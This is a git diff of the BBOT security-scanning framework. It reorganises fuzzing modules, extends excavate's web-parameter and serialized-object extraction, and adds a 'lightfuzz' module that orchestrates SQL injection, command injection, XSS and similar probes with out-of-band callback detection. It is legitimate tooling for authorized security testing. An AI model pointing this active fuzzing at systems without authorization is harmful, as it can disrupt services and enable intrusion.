a/bbot/modules/base.py +++ b/bbot/modules/base.py @@ -533,8 +533,10 @@ async def emit_event(self, *args, **kwargs): if v is not None: emit_kwargs[o] = v event = self.make_event(*args, **event_kwargs) - if event: - await self.queue_outgoing_event(event, **emit_kwargs) + if event is not None: + children = event.children + for e in [event] + children: + await self.queue_outgoing_event(e, **emit_kwargs) return event async def _events_waiting(self, batch_size=None): diff --git a/bbot/modules/deadly/dastardly.py b/bbot/modules/dastardly.py similarity index 98% rename from bbot/modules/deadly/dastardly.py rename to bbot/modules/dastardly.py index 2677818161..b9dd772a73 100644 --- a/bbot/modules/deadly/dastardly.py +++ b/bbot/modules/dastardly.py @@ -5,7 +5,7 @@ class dastardly(BaseModule): watched_events = ["HTTP_RESPONSE"] produced_events = ["FINDING", "VULNERABILITY"] - flags = ["active", "aggressive", "slow", "web-thorough"] + flags = ["active", "aggressive", "slow", "web-thorough", "deadly"] meta = { "description": "Lightweight web application security scanner", "created_date": "2023-12-11", diff --git a/bbot/modules/deadly/ffuf.py b/bbot/modules/ffuf.py similarity index 99% rename from bbot/modules/deadly/ffuf.py rename to bbot/modules/ffuf.py index 63c8072c2b..81e114c7e7 100644 --- a/bbot/modules/deadly/ffuf.py +++ b/bbot/modules/ffuf.py @@ -9,7 +9,7 @@ class ffuf(BaseModule): watched_events = ["URL"] produced_events = ["URL_UNVERIFIED"] - flags = ["aggressive", "active"] + flags = ["aggressive", "active", "deadly"] meta = {"description": "A fast web fuzzer written in Go", "created_date": "2022-04-10", "author": "@liquidsec"} options = { diff --git a/bbot/modules/ffuf_shortnames.py b/bbot/modules/ffuf_shortnames.py index 83d1c13a13..db44ed1108 100644 --- a/bbot/modules/ffuf_shortnames.py +++ b/bbot/modules/ffuf_shortnames.py @@ -3,7 +3,7 @@ import random import string -from bbot.modules.deadly.ffuf import ffuf +from bbot.modules.ffuf import ffuf class ffuf_shortnames(ffuf): diff --git a/bbot/modules/httpx.py b/bbot/modules/httpx.py index 8edc4e1d69..21fa48d63d 100644 --- a/bbot/modules/httpx.py +++ b/bbot/modules/httpx.py @@ -3,6 +3,8 @@ import tempfile import subprocess from pathlib import Path +from http.cookies import SimpleCookie + from bbot.modules.base import BaseModule @@ -137,8 +139,20 @@ async def handle_batch(self, *events): if self.probe_all_ips: command += ["-probe-all-ips"] + # Add custom HTTP headers for hk, hv in self.scan.custom_http_headers.items(): command += ["-header", f"{hk}: {hv}"] + + # Add custom HTTP cookies as a single header + if self.scan.custom_http_cookies: + cookie = SimpleCookie() + for ck, cv in self.scan.custom_http_cookies.items(): + cookie[ck] = cv + + # Build the cookie header + cookie_header = f"Cookie: {cookie.output(header='', sep='; ').strip()}" + command += ["-header", cookie_header] + proxy = self.scan.http_proxy if proxy: command += ["-http-proxy", proxy] diff --git a/bbot/modules/hunt.py b/bbot/modules/hunt.py index bfd5c63200..6f3e619965 100644 --- a/bbot/modules/hunt.py +++ b/bbot/modules/hunt.py @@ -284,11 +284,29 @@ class hunt(BaseModule): async def handle_event(self, event): p = event.data["name"] + matching_categories = [] + + # Collect all matching categories for k in hunt_param_dict.keys(): if p.lower() in hunt_param_dict[k]: - description = f"Found potential {k.upper()} parameter [{p}]" - data = {"host": str(event.host), "description": description} - url = event.data.get("url", "") - if url: - data["url"] = url - await self.emit_event(data, "FINDING", event) + matching_categories.append(k) + + if matching_categories: + # Create a comma-separated string of categories + category_str = ", ".join(matching_categories) + description = f"Found potentially interesting parameter. Name: [{p}] Parameter Type: [{event.data['type']}] Categories: [{category_str}]" + + if ( + "original_value" in event.data.keys() + and event.data["original_value"] != "" + and event.data["original_value"] is not None + ): + description += ( + f" Original Value: [{self.helpers.truncate_string(str(event.data['original_value']), 200)}]" + ) + + data = {"host": str(event.host), "description": description} + url = event.data.get("url", "") + if url: + data["url"] = url + await self.emit_event(data, "FINDING", event) diff --git a/bbot/modules/internal/aggregate.py b/bbot/modules/internal/aggregate.py index 54e3a52ccc..3bd5be12da 100644 --- a/bbot/modules/internal/aggregate.py +++ b/bbot/modules/internal/aggregate.py @@ -2,6 +2,7 @@ class aggregate(BaseReportModule): + watched_events = [] flags = ["passive", "safe"] meta = { "description": "Summarize statistics at the end of a scan", diff --git a/bbot/modules/internal/excavate.py b/bbot/modules/internal/excavate.py index 69a1a32be3..d25fb2b9ae 100644 --- a/bbot/modules/internal/excavate.py +++ b/bbot/modules/internal/excavate.py @@ -63,6 +63,17 @@ def _exclude_key(original_dict, key_to_exclude): def extract_params_url(parsed_url): + """ + Yields query parameters from a parsed URL. + + Args: + parsed_url (ParseResult): The URL to extract parameters from. + + Yields: + tuple: Contains the hardcoded HTTP method ('GET'), parsed URL, parameter name, + original value, source (hardcoded to 'direct_url'), and additional parameters + (all parameters excluding the current one). + """ params = parse_qs(parsed_url.query) flat_params = {k: v[0] for k, v in params.items()} @@ -301,21 +312,35 @@ class excavateTestRule(ExcavateRule): } options = { - "retain_querystring": False, + "retain_querystring": True, "yara_max_match_data": 2000, "custom_yara_rules": "", + "speculate_params": False, } options_desc = { "retain_querystring": "Keep the querystring intact on emitted WEB_PARAMETERS", "yara_max_match_data": "Sets the maximum amount of text that can extracted from a YARA regex", "custom_yara_rules": "Include custom Yara rules", + "speculate_params": "Enable speculative parameter extraction from JSON and XML content", } scope_distance_modifier = None accept_dupes = False _module_threads = 8 - parameter_blacklist = { + parameter_blacklist_prefix = [ + "TS01", + "BIGipServer", + "incap_", + "visid_incap_", + "AWSALB", + "utm_", + "ApplicationGatewayAffinity", + "JSESSIONID", + "ARRAffinity", + ] + + parameter_blacklist = set( p.lower() for p in [ "__VIEWSTATE", @@ -327,18 +352,30 @@ class excavateTestRule(ExcavateRule): "__SCROLLPOSITIONY", "__SCROLLPOSITIONX", "ASP.NET_SessionId", - "JSESSIONID", "PHPSESSID", + "__cf_bm", + "f5_cspm", ] - } + ) yara_rule_name_regex = re.compile(r"rule\s(\w+)\s{") yara_rule_regex = re.compile(r"(?s)((?:rule\s+\w+\s*{[^{}]*(?:{[^{}]*}[^{}]*)*[^{}]*(?:/\S*?}[^/]*?/)*)*})") def in_bl(self, value): - return value.lower() in self.parameter_blacklist + # Check if the value is in the blacklist or starts with a blacklisted prefix. + lower_value = value.lower() + + if lower_value in self.parameter_blacklist: + return True + + for bl_param_prefix in self.parameter_blacklist_prefix: + if lower_value.startswith(bl_param_prefix.lower()): + return True + + return False def url_unparse(self, param_type, parsed_url): + # Reconstructs a URL, optionally omitting the query string based on retain_querystring configuration value. if param_type == "GETPARAM": querystring = "" else: @@ -392,7 +429,7 @@ def extract(self): yield ( self.output_type, parameter_name, - original_value, + original_value.strip(), action, _exclude_key(extracted_parameters_dict, parameter_name), ) @@ -405,7 +442,7 @@ class PostJquery(GetJquery): class HtmlTags(ParameterExtractorRule): name = "HTML Tags" - discovery_regex = r'/<[^>]+(href|src)=["\'][^"\']*["\'][^>]*>/ nocase' + discovery_regex = r'/<[^>]+(href|src|action)=["\']?[^"\'>\s]*["\']?[^>]*>/ nocase' extraction_regex = bbot_regexes.tag_attribute_regex output_type = "GETPARAM" @@ -413,48 +450,125 @@ def extract(self): urls = self.extraction_regex.findall(str(self.result)) for url in urls: parsed_url = urlparse(url) - query_strings = parse_qs(parsed_url.query) - query_strings_dict = { - k: v[0] if isinstance(v, list) and len(v) == 1 else v for k, v in query_strings.items() - } + query_strings = parse_qs(html.unescape(parsed_url.query)) + query_strings_dict = {k: v[0] if isinstance(v, list) else v for k, v in query_strings.items()} for parameter_name, original_value in query_strings_dict.items(): yield ( self.output_type, parameter_name, - original_value, + original_value.strip(), url, _exclude_key(query_strings_dict, parameter_name), ) + class AjaxJquery(ParameterExtractorRule): + name = "JQuery Extractor" + discovery_regex = r"/\$\.ajax\(\{[^\<$\$]*\}\)/s nocase" + extraction_regex = None + output_type = "BODYJSON" + ajax_content_regexes = { + "url": r"url\s*:\s*['\"](.*?)['\"]", + "type": r"type\s*:\s*['\"](.*?)['\"]", + "content_type": r"contentType\s*:\s*['\"](.*?)['\"]", + "data": r"data:.*(\{[^}]*\})", + } + + def extract(self): + # Iterate through each regex in ajax_content_regexes + extracted_values = {} + for key, pattern in self.ajax_content_regexes.items(): + match = re.search(pattern, self.result) + if match: + # Store the matched value in the dictionary + extracted_values[key] = match.group(1) + + # check to see if the format is defined as JSON + if "content_type" in extracted_values.keys(): + if extracted_values["content_type"] == "application/json": + form_parameters = {} + + # If we cant figure out the parameter names, there is no point in continuing + if "data" in extracted_values.keys(): + if "url" in extracted_values.keys(): + form_url = extracted_values["url"] + else: + form_url = None + + try: + s = extracted_values["data"] + s = re.sub(r"(\w+)\s*:", r'"\1":', s) # Quote keys + s = re.sub(r":\s*(\w+)", r': "\1"', s) # Quote values if they are unquoted + data = json.loads(s) + except (ValueError, SyntaxError): + return None + for p in data.keys(): + form_parameters[p] = None + + for parameter_name in form_parameters: + yield ( + "BODYJSON", + parameter_name, + None, + form_url, + _exclude_key(form_parameters, parameter_name), + ) + class GetForm(ParameterExtractorRule): name = "GET Form" discovery_regex = r'/]*\bmethod=["\']?get["\']?[^>]*>.*<\/form>/s nocase' - form_content_regexes = [ - bbot_regexes.input_tag_regex, - bbot_regexes.select_tag_regex, - bbot_regexes.textarea_tag_regex, - ] + form_content_regexes = { + "input_tag_regex": bbot_regexes.input_tag_regex, + "input_tag_regex2": bbot_regexes.input_tag_regex2, + "select_tag_regex": bbot_regexes.select_tag_regex, + "textarea_tag_regex": bbot_regexes.textarea_tag_regex, + "textarea_tag_regex2": bbot_regexes.textarea_tag_regex2, + "textarea_tag_novalue_regex": bbot_regexes.textarea_tag_novalue_regex, + "button_tag_regex": bbot_regexes.button_tag_regex, + "button_tag_regex2": bbot_regexes.button_tag_regex2, + "_input_tag_novalue_regex": bbot_regexes.input_tag_novalue_regex, + } extraction_regex = bbot_regexes.get_form_regex output_type = "GETPARAM" def extract(self): forms = self.extraction_regex.findall(str(self.result)) for form_action, form_content in forms: + if not form_action or form_action == "#": + form_action = None + + elif form_action.startswith("./"): + form_action = form_action.lstrip(".") + form_parameters = {} - for form_content_regex in self.form_content_regexes: + for form_content_regex_name, form_content_regex in self.form_content_regexes.items(): input_tags = form_content_regex.findall(form_content) + if input_tags: + # Normalize each input_tag to be a tuple of two elements + input_tags = [(tag if isinstance(tag, tuple) else (tag, None)) for tag in input_tags] + + if form_content_regex_name in [ + "input_tag_regex2", + "button_tag_regex2", + "textarea_tag_regex2", + ]: + # Swap elements if needed + input_tags = [(b, a) for a, b in input_tags] + for parameter_name, original_value in input_tags: + form_parameters.setdefault( + parameter_name, original_value.strip() if original_value else None + ) + + for parameter_name, original_value in form_parameters.items(): + yield ( + self.output_type, + parameter_name, + original_value, + form_action, + _exclude_key(form_parameters, parameter_name), + ) - for parameter_name, original_value in input_tags: - form_parameters[parameter_name] = original_value - - for parameter_name, original_value in form_parameters.items(): - yield ( - self.output_type, - parameter_name, - original_value, - form_action, - _exclude_key(form_parameters, parameter_name), - ) + class GetForm2(GetForm): + extraction_regex = bbot_regexes.get_form_regex2 class PostForm(GetForm): name = "POST Form" @@ -462,6 +576,21 @@ class PostForm(GetForm): extraction_regex = bbot_regexes.post_form_regex output_type = "POSTPARAM" + class PostForm2(PostForm): + extraction_regex = bbot_regexes.post_form_regex2 + + class PostForm_NoAction(PostForm): + name = "POST Form (no action)" + extraction_regex = bbot_regexes.post_form_regex_noaction + + # underscore ensure generic forms runs last, so it doesn't cause dedupe to stop full form detection + class _GenericForm(GetForm): + name = "Generic Form" + discovery_regex = r"/]*>.*<\/form>/s nocase" + + extraction_regex = bbot_regexes.generic_form_regex + output_type = "GETPARAM" + def __init__(self, excavate): super().__init__(excavate) self.parameterExtractorCallbackDict = {} @@ -473,7 +602,7 @@ def __init__(self, excavate): regexes_component_list.append(f"${r.__name__} = {r.discovery_regex}") regexes_component = " ".join(regexes_component_list) self.yara_rules["parameter_extraction"] = ( - rf'rule parameter_extraction {{meta: description = "contains POST form" strings: {regexes_component} condition: any of them}}' + rf'rule parameter_extraction {{meta: description = "contains Parameter" strings: {regexes_component} condition: any of them}}' ) async def process(self, yara_results, event, yara_rule_settings, discovery_context): @@ -496,12 +625,27 @@ async def process(self, yara_results, event, yara_rule_settings, discovery_conte self.excavate.debug( f"Found Parameter [{parameter_name}] in [{parameterExtractorSubModule.name}] ParameterExtractor Submodule" ) - endpoint = event.data["url"] if not endpoint else endpoint - url = ( - endpoint - if endpoint.startswith(("http://", "https://")) - else f"{event.parsed_url.scheme}://{event.parsed_url.netloc}{endpoint}" - ) + + # account for the case where the action is html encoded + if endpoint and ( + endpoint.startswith("https://") + or endpoint.startswith("http://") + ): + endpoint = html.unescape(endpoint) + + # If we have a full URL, leave it as-is + if endpoint and endpoint.startswith(("http://", "https://")): + url = endpoint + + # The endpoint is usually a form action - we should use it if we have it. If not, default to URL. + else: + # Use the original URL as the base and resolve the endpoint correctly in case of relative paths + base_url = ( + f"{event.parsed_url.scheme}://{event.parsed_url.netloc}{event.parsed_url.path}" + ) + if self.excavate.retain_querystring and len(event.parsed_url.query) > 0: + base_url += f"?{event.parsed_url.query}" + url = urljoin(base_url, endpoint) if self.excavate.helpers.validate_parameter(parameter_name, parameter_type): if self.excavate.in_bl(parameter_name) is False: @@ -599,12 +743,13 @@ async def process(self, yara_results, event, yara_rule_settings, discovery_conte class SerializationExtractor(ExcavateRule): regexes = { - "Java": re.compile(r"[^a-zA-Z0-9\/+]rO0[a-zA-Z0-9+\/]+={0,2}"), - "DOTNET": re.compile(r"[^a-zA-Z0-9\/+]AAEAAAD\/\/[a-zA-Z0-9\/+]+={0,2}"), - "PHP_Array": re.compile(r"[^a-zA-Z0-9\/+]YTo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), - "PHP_String": re.compile(r"[^a-zA-Z0-9\/+]czo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), - "PHP_Object": re.compile(r"[^a-zA-Z0-9\/+]Tzo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), - "Possible_Compressed": re.compile(r"[^a-zA-Z0-9\/+]H4sIAAAAAAAA[a-zA-Z0-9+\/]+={0,2}"), + "Java": re.compile(r"[^a-zA-Z0-9\/+][\"']?rO0[a-zA-Z0-9+\/]+={0,2}"), + "Ruby": re.compile(r"[^a-zA-Z0-9\/+][\"']?BAh[a-zA-Z0-9+\/]+={0,2}"), + "DOTNET": re.compile(r"[^a-zA-Z0-9\/+][\"']?AAEAAAD\/\/[a-zA-Z0-9\/+]+={0,2}"), + "PHP_Array": re.compile(r"[^a-zA-Z0-9\/+][\"']?YTo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), + "PHP_String": re.compile(r"[^a-zA-Z0-9\/+][\"']?czo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), + "PHP_Object": re.compile(r"[^a-zA-Z0-9\/+][\"']?Tzo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), + "Possible_Compressed": re.compile(r"[^a-zA-Z0-9\/+][\"']?H4sIAAAA[a-zA-Z0-9+\/]+={0,2}"), } yara_rules = {} @@ -612,7 +757,7 @@ def __init__(self, excavate): super().__init__(excavate) regexes_component_list = [] for regex_name, regex in self.regexes.items(): - regexes_component_list.append(rf"${regex_name} = /\b{regex.pattern}/ nocase") + regexes_component_list.append(rf"${regex_name} = /\b{regex.pattern}/") regexes_component = " ".join(regexes_component_list) self.yara_rules["serialization_detection"] = ( f'rule serialization_detection {{meta: description = "contains a possible serialized object" strings: {regexes_component} condition: any of them}}' @@ -702,7 +847,7 @@ class URLExtractor(ExcavateRule): tags = "spider-danger" description = "contains tag with src or href attribute" strings: - $url_attr = /<[^>]+(href|src)=["\'][^"\']*["\'][^>]*>/ + $url_attr = /<[^>]+(href|src|action)=["\']?[^"\']*["\']?[^>]*>/ condition: $url_attr } @@ -749,7 +894,6 @@ async def process(self, yara_results, event, yara_rule_settings, discovery_conte if final_url: if self.excavate.scan.in_scope(final_url): urls_found += 1 - await self.report( final_url, event, @@ -812,6 +956,36 @@ async def extract_yara_rules(self, rules_content): for r in await self.helpers.re.findall(self.yara_rule_regex, rules_content): yield r + async def emit_web_parameter( + self, host, param_type, name, original_value, url, description, additional_params, event, context + ): + data = { + "host": host, + "type": param_type, + "name": name, + "original_value": original_value, + "url": url, + "description": description, + "additional_params": additional_params, + } + await self.emit_event(data, "WEB_PARAMETER", event, context=context) + + async def emit_custom_parameters(self, event, config_key, param_type, description_suffix): + # Emits WEB_PARAMETER events for custom headers and cookies from the configuration. + custom_params = self.scan.web_config.get(config_key, {}) + for param_name, param_value in custom_params.items(): + await self.emit_web_parameter( + host=event.parsed_url.hostname, + param_type=param_type, + name=param_name, + original_value=param_value, + url=self.url_unparse(param_type, event.parsed_url), + description=f"HTTP Extracted Parameter [{param_name}] ({description_suffix})", + additional_params=_exclude_key(custom_params, param_name), + event=event, + context=f"Excavate saw a custom {param_type.lower()} set [{param_name}], and emitted a WEB_PARAMETER for it", + ) + async def setup(self): self.yara_rules_dict = {} self.yara_preprocess_dict = {} @@ -823,6 +997,7 @@ async def setup(self): ] self.parameter_extraction = bool(modules_WEB_PARAMETER) + self.speculate_params = bool(self.config.get("speculate_params", False)) self.retain_querystring = False if self.config.get("retain_querystring", False) is True: @@ -903,10 +1078,9 @@ async def setup(self): async def search(self, data, event, content_type, discovery_context="HTTP response"): if not data: return None - decoded_data = await self.helpers.re.recursive_decode(data) - if self.parameter_extraction: + if self.parameter_extraction and self.speculate_params: content_type_lower = content_type.lower() if content_type else "" extraction_map = { "json": self.helpers.extract_params_json, @@ -918,62 +1092,74 @@ async def search(self, data, event, content_type, discovery_context="HTTP respon results = extract_func(data) if results: for parameter_name, original_value in results: - description = ( - f"HTTP Extracted Parameter (speculative from {source_type} content) [{parameter_name}]" + await self.emit_web_parameter( + host=str(event.host), + param_type="SPECULATIVE", + name=parameter_name, + original_value=original_value, + url=str(event.data["url"]), + description=f"HTTP Extracted Parameter (speculative from {source_type} content) [{parameter_name}]", + additional_params={}, + event=event, + context=f"excavate's Parameter extractor found a speculative WEB_PARAMETER: {parameter_name} by parsing {source_type} data from {str(event.host)}", ) - data = { - "host": str(event.host), - "type": "SPECULATIVE", - "name": parameter_name, - "original_value": original_value, - "url": str(event.data["url"]), - "additional_params": {}, - "assigned_cookies": self.assigned_cookies, - "description": description, - } - context = f"excavate's Parameter extractor found a speculative WEB_PARAMETER: {parameter_name} by parsing {source_type} data from {str(event.host)}" - await self.emit_event(data, "WEB_PARAMETER", event, context=context) return - for result in self.yara_rules.match(data=f"{data}\n{decoded_data}"): - rule_name = result.rule - if rule_name in self.yara_preprocess_dict: - await self.yara_preprocess_dict[rule_name](result, event, discovery_context) - else: - self.hugewarning(f"YARA Rule {rule_name} not found in pre-compiled rules") + # Initialize the list of data items to process + data_items = [] + + # Check if data and decoded_data are identical + if data == decoded_data: + data_items.append(("data", data)) # Add only one since both are the same + else: + data_items.append(("data", data)) + data_items.append(("decoded_data", decoded_data)) + + for label, data_instance in data_items: + # Your existing processing code + for result in self.yara_rules.match(data=f"{data_instance}"): + rule_name = result.rule + + # Skip specific operations for 'parameter_extraction' rule on decoded_data + if label == "decoded_data" and rule_name == "parameter_extraction": + continue + + # Check if rule processing function exists + if rule_name in self.yara_preprocess_dict: + await self.yara_preprocess_dict[rule_name](result, event, discovery_context) + else: + self.hugewarning(f"YARA Rule {rule_name} not found in pre-compiled rules") async def handle_event(self, event): if event.type == "HTTP_RESPONSE": - # Harvest GET parameters from URL, if it came directly from the target, and parameter extraction is enabled - if ( - self.parameter_extraction is True - and self.url_querystring_remove is False - and str(event.parent.parent.module) == "TARGET" - ): - self.debug(f"Processing target URL [{urlunparse(event.parsed_url)}] for GET parameters") - for ( - method, - parsed_url, - parameter_name, - original_value, - regex_name, - additional_params, - ) in extract_params_url(event.parsed_url): - if self.in_bl(parameter_name) is False: - description = f"HTTP Extracted Parameter [{parameter_name}] (Target URL)" - data = { - "host": parsed_url.hostname, - "type": "GETPARAM", - "name": parameter_name, - "original_value": original_value, - "url": self.url_unparse("GETPARAM", parsed_url), - "description": description, - "additional_params": additional_params, - } - context = f"Excavate parsed a URL directly from the scan target for parameters and found [GETPARAM] Parameter Name: [{parameter_name}] and emitted a WEB_PARAMETER for it" - await self.emit_event(data, "WEB_PARAMETER", event, context=context) - - data = event.data + if self.parameter_extraction is True: + # if parameter extraction is enabled, and we have custom cookies or headers, emit them as WEB_PARAMETER events + await self.emit_custom_parameters(event, "http_cookies", "COOKIE", "Custom Cookie") + await self.emit_custom_parameters(event, "http_headers", "HEADER", "Custom Header") + + # if parameter extraction is enabled, and querystring removal is disabled, and the event is directly from the TARGET, create a WEB + if self.url_querystring_remove is False and str(event.parent.parent.module) == "TARGET": + self.debug(f"Processing target URL [{urlunparse(event.parsed_url)}] for GET parameters") + for ( + method, + parsed_url, + parameter_name, + original_value, + regex_name, + additional_params, + ) in extract_params_url(event.parsed_url): + if self.in_bl(parameter_name) is False: + await self.emit_web_parameter( + host=parsed_url.hostname, + param_type="GETPARAM", + name=parameter_name, + original_value=original_value, + url=self.url_unparse("GETPARAM", parsed_url), + description=f"HTTP Extracted Parameter [{parameter_name}] (Target URL)", + additional_params=additional_params, + event=event, + context=f"Excavate parsed a URL directly from the scan target for parameters and found [GETPARAM] Parameter Name: [{parameter_name}] and emitted a WEB_PARAMETER for it", + ) # process response data body = event.data.get("body", "") @@ -987,29 +1173,31 @@ async def handle_event(self, event): for header, header_values in headers.items(): for header_value in header_values: + # Process 'set-cookie' headers to extract and emit cookies as WEB_PARAMETER events. if header.lower() == "set-cookie" and self.parameter_extraction: if "=" not in header_value: self.debug(f"Cookie found without '=': {header_value}") continue else: - cookie_name = header_value.split("=")[0] - cookie_value = header_value.split("=")[1].split(";")[0] + cookie_name, _, remainder = header_value.partition("=") + cookie_value = remainder.split(";")[0] - if self.in_bl(cookie_value) is False: + if self.in_bl(cookie_name) is False: self.assigned_cookies[cookie_name] = cookie_value - description = f"Set-Cookie Assigned Cookie [{cookie_name}]" - data = { - "host": str(event.host), - "type": "COOKIE", - "name": cookie_name, - "original_value": cookie_value, - "url": self.url_unparse("COOKIE", event.parsed_url), - "description": description, - } - context = f"Excavate noticed a set-cookie header for cookie [{cookie_name}] and emitted a WEB_PARAMETER for it" - await self.emit_event(data, "WEB_PARAMETER", event, context=context) + await self.emit_web_parameter( + host=str(event.host), + param_type="COOKIE", + name=cookie_name, + original_value=cookie_value, + url=self.url_unparse("COOKIE", event.parsed_url), + description=f"Set-Cookie Assigned Cookie [{cookie_name}]", + additional_params={}, + event=event, + context=f"Excavate noticed a set-cookie header for cookie [{cookie_name}] and emitted a WEB_PARAMETER for it", + ) else: self.debug(f"blocked cookie parameter [{cookie_name}] due to BL match") + # Handle 'location' headers to process and emit redirect URLs as URL_UNVERIFIED events. if header.lower() == "location": redirect_location = getattr(event, "redirect_location", "") if redirect_location: @@ -1040,18 +1228,17 @@ async def handle_event(self, event): additional_params, ) in extract_params_location(header_value, event.parsed_url): if self.in_bl(parameter_name) is False: - description = f"HTTP Extracted Parameter [{parameter_name}] (Location Header)" - data = { - "host": parsed_url.hostname, - "type": "GETPARAM", - "name": parameter_name, - "original_value": original_value, - "url": self.url_unparse("GETPARAM", parsed_url), - "description": description, - "additional_params": additional_params, - } - context = f"Excavate parsed a location header for parameters and found [GETPARAM] Parameter Name: [{parameter_name}] and emitted a WEB_PARAMETER for it" - await self.emit_event(data, "WEB_PARAMETER", event, context=context) + await self.emit_web_parameter( + host=parsed_url.hostname, + param_type="GETPARAM", + name=parameter_name, + original_value=original_value, + url=self.url_unparse("GETPARAM", parsed_url), + description=f"HTTP Extracted Parameter [{parameter_name}] (Location Header)", + additional_params=additional_params, + event=event, + context=f"Excavate parsed a location header for parameters and found [GETPARAM] Parameter Name: [{parameter_name}] and emitted a WEB_PARAMETER for it", + ) else: self.warning("location header found but missing redirect_location in HTTP_RESPONSE") if header.lower() == "content-type": diff --git a/bbot/modules/lightfuzz/lightfuzz.py b/bbot/modules/lightfuzz/lightfuzz.py new file mode 100644 index 0000000000..106805178d --- /dev/null +++ b/bbot/modules/lightfuzz/lightfuzz.py @@ -0,0 +1,200 @@ +import importlib +from bbot.modules.base import BaseModule + +from urllib.parse import urlunparse +from bbot.errors import InteractshError + + +class lightfuzz(BaseModule): + watched_events = ["URL", "WEB_PARAMETER"] + produced_events = ["FINDING", "VULNERABILITY"] + flags = ["active", "aggressive", "web-thorough", "deadly"] + + options = { + "force_common_headers": False, + "enabled_submodules": ["sqli", "cmdi", "xss", "path", "ssti", "crypto", "serial", "nosqli"], + "disable_post": False, + } + options_desc = { + "force_common_headers": "Force emit commonly exploitable parameters that may be difficult to detect", + "enabled_submodules": "A list of submodules to enable. Empty list enabled all modules.", + "disable_post": "Disable processing of POST parameters, avoiding form submissions.", + } + + meta = { + "description": "Find Web Parameters and Lightly Fuzz them using a heuristic based scanner", + "author": "@liquidsec", + "created_date": "2024-06-28", + } + common_headers = ["x-forwarded-for", "user-agent"] + in_scope_only = True + + _module_threads = 4 + + async def setup(self): + self.event_dict = {} + self.interactsh_subdomain_tags = {} + self.interactsh_instance = None + self.disable_post = self.config.get("disable_post", False) + self.enabled_submodules = self.config.get("enabled_submodules") + self.interactsh_disable = self.scan.config.get("interactsh_disable", False) + self.submodules = {} + + if not self.enabled_submodules: + return False, "Lightfuzz enabled without any submodules. Must enable at least one submodule." + + for submodule_name in self.enabled_submodules: + try: + submodule_module = importlib.import_module(f"bbot.modules.lightfuzz.submodules.{submodule_name}") + submodule_class = getattr(submodule_module, submodule_name) + except ImportError: + return False, f"Invalid Lightfuzz submodule ({submodule_name}) specified in enabled_modules" + self.submodules[submodule_name] = submodule_class + + interactsh_needed = any(submodule.uses_interactsh for submodule in self.submodules.values()) + + if interactsh_needed and not self.interactsh_disable: + try: + self.interactsh_instance = self.helpers.interactsh() + self.interactsh_domain = await self.interactsh_instance.register(callback=self.interactsh_callback) + except InteractshError as e: + self.warning(f"Interactsh failure: {e}") + return True + + async def interactsh_callback(self, r): + full_id = r.get("full-id", None) + if full_id: + if "." in full_id: + details = self.interactsh_subdomain_tags.get(full_id.split(".")[0]) + if not details["event"]: + return + # currently, this is only used by the cmdi submodule. Later, when other modules use it, we will need to store description data in the interactsh_subdomain_tags dictionary + await self.emit_event( + { + "severity": "CRITICAL", + "host": str(details["event"].host), + "url": details["event"].data["url"], + "description": f"OS Command Injection (OOB Interaction) Type: [{details['type']}] Parameter Name: [{details['name']}] Probe: [{details['probe']}]", + }, + "VULNERABILITY", + details["event"], + ) + else: + # this is likely caused by something trying to resolve the base domain first and can be ignored + self.debug("skipping result because subdomain tag was missing") + + def _outgoing_dedup_hash(self, event): + return hash( + ( + "lightfuzz", + str(event.host), + event.data["url"], + event.data["description"], + event.data.get("type", ""), + event.data.get("name", ""), + ) + ) + + def url_unparse(self, param_type, parsed_url): + """ + Reconstructs a URL from its components, optionally omitting the query string for GET parameters. + + Parameters: + - param_type (str): The type of parameter, typically "GETPARAM" or another type indicating the request method. + - parsed_url (ParseResult): A named tuple containing the components of the URL (scheme, netloc, path, params, query, fragment). + + Returns: + - str: The reconstructed URL as a string. + + The method checks if the parameter type is "GETPARAM". If so, it omits the query string from the reconstructed URL unless + the retain_querystring flag is set to True. For other parameter types, it includes the query string. + """ + if param_type == "GETPARAM": + querystring = "" + else: + querystring = parsed_url.query + return urlunparse( + ( + parsed_url.scheme, + parsed_url.netloc, + parsed_url.path, + "", + querystring if self.retain_querystring else "", + "", + ) + ) + + async def run_submodule(self, submodule, event): + submodule_instance = submodule(self, event) + await submodule_instance.fuzz() + if len(submodule_instance.results) > 0: + for r in submodule_instance.results: + event_data = {"host": str(event.host), "url": event.data["url"], "description": r["description"]} + + envelopes = getattr(event, "envelopes", None) + envelope_summary = getattr(envelopes, "summary", None) + if envelope_summary: + # Append the envelope summary to the description + event_data["description"] += f" Envelopes: [{envelope_summary}]" + + if r["type"] == "VULNERABILITY": + event_data["severity"] = r["severity"] + await self.emit_event( + event_data, + r["type"], + event, + ) + + async def handle_event(self, event): + if event.type == "URL": + if self.config.get("force_common_headers", False) is False: + return False + + # If force_common_headers is True, we force the emission of a WEB_PARAMETER for each of the common headers to force fuzzing against them + for h in self.common_headers: + description = f"Speculative (Forced) Header [{h}]" + data = { + "host": str(event.host), + "type": "HEADER", + "name": h, + "original_value": None, + "url": event.data, + "description": description, + } + await self.emit_event(data, "WEB_PARAMETER", event) + + elif event.type == "WEB_PARAMETER": + # check connectivity to url + connectivity_test = await self.helpers.request(event.data["url"], timeout=10) + + if connectivity_test: + for submodule_name, submodule in self.submodules.items(): + self.debug(f"Starting {submodule_name} fuzz()") + await self.run_submodule(submodule, event) + else: + self.debug(f"WEB_PARAMETER URL {event.data['url']} failed connectivity test, aborting") + + async def cleanup(self): + if self.interactsh_instance: + try: + await self.interactsh_instance.deregister() + self.debug( + f"successfully deregistered interactsh session with correlation_id {self.interactsh_instance.correlation_id}" + ) + except InteractshError as e: + self.warning(f"Interactsh failure: {e}") + + async def finish(self): + if self.interactsh_instance: + await self.helpers.sleep(5) + try: + for r in await self.interactsh_instance.poll(): + await self.interactsh_callback(r) + except InteractshError as e: + self.debug(f"Error in interact.sh: {e}") + + # If we've disabled fuzzing POST parameters, back out of POSTPARAM WEB_PARAMETER events as quickly as possible + async def filter_event(self, event): + if event.type == "WEB_PARAMETER" and self.disable_post and event.data["type"] == "POSTPARAM": + return False, "POST parameter disabled in lightfuzz module" + return True diff --git a/bbot/modules/lightfuzz/submodules/__init__.py b/bbot/modules/lightfuzz/submodules/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/bbot/modules/lightfuzz/submodules/base.py 